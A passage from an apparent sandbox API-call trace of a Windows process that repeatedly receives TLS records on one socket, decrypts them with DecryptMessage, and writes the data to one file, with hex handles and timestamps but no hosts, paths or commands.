lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0069.436] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0069.436] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 4128 [0069.436] DecryptMessage (in: phContext=0x267177c, pMessage=0x26dbd50, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26dbd50, pfQOP=0x0) returned 0x0 [0069.436] WriteFile (in: hFile=0x518, lpBuffer=0x26d9618*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26d9618*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0069.437] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0069.437] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 4128 [0069.437] DecryptMessage (in: phContext=0x267177c, pMessage=0x26dbe64, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26dbe64, pfQOP=0x0) returned 0x0 [0069.437] WriteFile (in: hFile=0x518, lpBuffer=0x26d9618*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26d9618*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0069.437] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0069.437] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 3969 [0069.437] recv (in: s=0x51c, buf=0x2650c02, len=159, flags=0 | out: buf=0x2650c02*) returned 159 [0069.561] DecryptMessage (in: phContext=0x267177c, pMessage=0x26dbf78, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26dbf78, pfQOP=0x0) returned 0x0 [0069.561] WriteFile (in: hFile=0x518, lpBuffer=0x26d9618*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26d9618*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0069.561] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0069.561] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 4128 [0069.561] DecryptMessage (in: phContext=0x267177c, pMessage=0x26dc08c, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26dc08c, pfQOP=0x0) returned 0x0 [0069.561] WriteFile (in: hFile=0x518, lpBuffer=0x26d9618*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26d9618*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0069.562] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0069.562] recv (in: s=0x51c, buf=0x264fc81, len=12320, flags=0 | out: buf=0x264fc81*) returned 10303 [0069.562] recv (in: s=0x51c, buf=0x26524c0, len=2017, flags=0 | out: buf=0x26524c0*) returned 2017 [0069.684] DecryptMessage (in: phContext=0x267177c, pMessage=0x26dc1a0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26dc1a0, pfQOP=0x0) returned 0x0 [0069.684] WriteFile (in: hFile=0x518, lpBuffer=0x26d9618*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26d9618*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0069.685] WriteFile (in: hFile=0x518, lpBuffer=0x26c96b9*, nNumberOfBytesToWrite=0x2f2f, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c96b9*, lpNumberOfBytesWritten=0x5bebc4*=0x2f2f, lpOverlapped=0x0) returned 1 [0069.685] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0069.685] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 4128 [0069.685] DecryptMessage (in: phContext=0x267177c, pMessage=0x26dc2b4, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26dc2b4, pfQOP=0x0) returned 0x0 [0069.685] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0069.685] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0069.685] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 4128 [0069.685] DecryptMessage (in: phContext=0x267177c, pMessage=0x26dc3c8, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26dc3c8, pfQOP=0x0) returned 0x0 [0069.685] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0069.686] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0069.686] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 1392 [0069.686] recv (in: s=0x51c, buf=0x26501f1, len=2736, flags=0 | out: buf=0x26501f1*) returned 2736 [0069.699] DecryptMessage (in: phContext=0x267177c, pMessage=0x26dc4dc, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26dc4dc, pfQOP=0x0) returned 0x0 [0069.699] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0069.700] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0069.700] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 3099 [0069.700] recv (in: s=0x51c, buf=0x265089c, len=1029, flags=0 | out: buf=0x265089c*) returned 1029 [0069.809] DecryptMessage (in: phContext=0x267177c, pMessage=0x26dc5f0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26dc5f0, pfQOP=0x0) returned 0x0 [0069.809] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0069.809] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0069.809] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 4128 [0069.810] DecryptMessage (in: phContext=0x267177c, pMessage=0x26dc704, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26dc704, pfQOP=0x0) returned 0x0 [0069.810] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0069.810] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0069.810] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 3593 [0069.810] recv (in: s=0x51c, buf=0x2650a8a, len=535, flags=0 | out: buf=0x2650a8a*) returned 535 [0069.811] DecryptMessage (in: phContext=0x267177c, pMessage=0x26dc818, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26dc818, pfQOP=0x0) returned 0x0 [0069.811] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0069.811] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0069.811] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 2380 [0069.811] recv (in: s=0x51c, buf=0x26505cd, len=1748, flags=0 | out: buf=0x26505cd*) returned 1748 [0069.819] DecryptMessage (in: phContext=0x267177c, pMessage=0x26dc92c, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26dc92c, pfQOP=0x0) returned 0x0 [0069.820] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0069.820] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0069.820] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 4087 [0069.820] recv (in: s=0x51c, buf=0x2650c78, len=41, flags=0 | out: buf=0x2650c78*) returned 41 [0070.048] DecryptMessage (in: phContext=0x267177c, pMessage=0x26dca40, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26dca40, pfQOP=0x0) returned 0x0 [0070.048] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0070.048] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0070.048] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 4128 [0070.048] DecryptMessage (in: phContext=0x267177c, pMessage=0x26dcb54, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26dcb54, pfQOP=0x0) returned 0x0 [0070.049] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0070.049] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0070.049] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 4128 [0070.049] DecryptMessage (in: phContext=0x267177c, pMessage=0x26dcc68, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26dcc68, pfQOP=0x0) returned 0x0 [0070.049] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0070.049] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0070.049] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 4128 [0070.050] DecryptMessage (in: phContext=0x267177c, pMessage=0x26dcd7c, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26dcd7c, pfQOP=0x0) returned 0x0 [0070.050] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0070.050] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0070.050] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 4128 [0070.050] DecryptMessage (in: phContext=0x267177c, pMessage=0x26dce90, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26dce90, pfQOP=0x0) returned 0x0 [0070.050] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0070.050] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0070.050] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 942 [0070.050] recv (in: s=0x51c, buf=0x265002f, len=3186, flags=0 | out: buf=0x265002f*) returned 3186 [0070.431] DecryptMessage (in: phContext=0x267177c, pMessage=0x26dcfa4, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26dcfa4, pfQOP=0x0) returned 0x0 [0070.431] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0070.432] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0070.432] recv (in: s=0x51c, buf=0x264fc81, len=12320, flags=0 | out: buf=0x264fc81*) returned 12320 [0070.432] DecryptMessage (in: phContext=0x267177c, pMessage=0x26dd0b8, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26dd0b8, pfQOP=0x0) returned 0x0 [0070.432] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x3000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x3000, lpOverlapped=0x0) returned 1 [0070.432] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0070.433] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 4128 [0070.433] DecryptMessage (in: phContext=0x267177c, pMessage=0x26dd1cc, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26dd1cc, pfQOP=0x0) returned 0x0 [0070.433] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0070.433] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0070.433] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 4128 [0070.433] DecryptMessage (in: phContext=0x267177c, pMessage=0x26dd2e0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26dd2e0, pfQOP=0x0) returned 0x0 [0070.433] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0070.433] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0070.434] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 4128 [0070.434] DecryptMessage (in: phContext=0x267177c, pMessage=0x26dd3f4, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26dd3f4, pfQOP=0x0) returned 0x0 [0070.434] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0070.434] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0070.434] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 4128 [0070.434] DecryptMessage (in: phContext=0x267177c, pMessage=0x26dd508, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26dd508, pfQOP=0x0) returned 0x0 [0070.434] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0070.434] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0070.434] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 4128 [0070.435] DecryptMessage (in: phContext=0x267177c, pMessage=0x26dd61c, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26dd61c, pfQOP=0x0) returned 0x0 [0070.435] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0070.435] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0070.435] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 4128 [0070.435] DecryptMessage (in: phContext=0x267177c, pMessage=0x26dd730, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26dd730, pfQOP=0x0) returned 0x0 [0070.435] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0070.435] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0070.436] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 566 [0070.436] recv (in: s=0x51c, buf=0x264feb7, len=3562, flags=0 | out: buf=0x264feb7*) returned 3562 [0070.664] DecryptMessage (in: phContext=0x267177c, pMessage=0x26dd844, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26dd844, pfQOP=0x0) returned 0x0 [0070.664] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0070.665] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0070.665] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 4128 [0070.665] DecryptMessage (in: phContext=0x267177c, pMessage=0x26dd958, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26dd958, pfQOP=0x0) returned 0x0 [0070.665] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0070.665] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0070.665] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 3980 [0070.665] recv (in: s=0x51c, buf=0x2650c0d, len=148, flags=0 | out: buf=0x2650c0d*) returned 148 [0070.792] DecryptMessage (in: phContext=0x267177c, pMessage=0x26dda6c, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26dda6c, pfQOP=0x0) returned 0x0 [0070.793] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0070.793] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0070.793] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 4128 [0070.793] DecryptMessage (in: phContext=0x267177c, pMessage=0x26ddb80, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26ddb80, pfQOP=0x0) returned 0x0 [0070.793] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0070.793] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0070.793] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 4128 [0070.793] DecryptMessage (in: phContext=0x267177c, pMessage=0x26ddc94, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26ddc94, pfQOP=0x0) returned 0x0 [0070.793] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0070.794] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0070.794] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 4128 [0070.794] DecryptMessage (in: phContext=0x267177c, pMessage=0x26ddda8, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26ddda8, pfQOP=0x0) returned 0x0 [0070.794] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0070.794] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0070.794] recv (in: s=0x51c, buf=0x264fc81, len=12320, flags=0 | out: buf=0x264fc81*) returned 2048 [0070.794] recv (in: s=0x51c, buf=0x2650481, len=10272, flags=0 | out: buf=0x2650481*) returned 10272 [0071.092] DecryptMessage (in: phContext=0x267177c, pMessage=0x26ddebc, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26ddebc, pfQOP=0x0) returned 0x0 [0071.092] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x3000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x3000, lpOverlapped=0x0) returned 1 [0071.093] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0071.093] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 4128 [0071.093] DecryptMessage (in: phContext=0x267177c, pMessage=0x26ddfd0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26ddfd0, pfQOP=0x0) returned 0x0 [0071.093] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0071.093] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0071.093] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 190 [0071.093] recv (in: s=0x51c, buf=0x264fd3f, len=3938, flags=0 | out: buf=0x264fd3f*) returned 3938 [0071.248] DecryptMessage (in: phContext=0x267177c, pMessage=0x26de0e4, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26de0e4, pfQOP=0x0) returned 0x0 [0071.248] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0071.248] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0071.248] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 4128 [0071.248] DecryptMessage (in: phContext=0x267177c, pMessage=0x26de1f8, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26de1f8, pfQOP=0x0) returned 0x0 [0071.248] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0071.248] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0071.248] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 4128 [0071.249] DecryptMessage (in: phContext=0x267177c, pMessage=0x26de30c, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26de30c, pfQOP=0x0) returned 0x0 [0071.249] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0071.249] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0071.249] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 2391 [0071.249] recv (in: s=0x51c, buf=0x26505d8, len=1737, flags=0 | out: buf=0x26505d8*) returned 1737 [0071.394] DecryptMessage (in: phContext=0x267177c, pMessage=0x26de420, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26de420, pfQOP=0x0) returned 0x0 [0071.394] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0071.395] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0071.396] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 4128 [0071.396] DecryptMessage (in: phContext=0x267177c, pMessage=0x26de534, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26de534, pfQOP=0x0) returned 0x0 [0071.396] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0071.396] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0071.396] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 4128 [0071.396] DecryptMessage (in: phContext=0x267177c, pMessage=0x26de648, 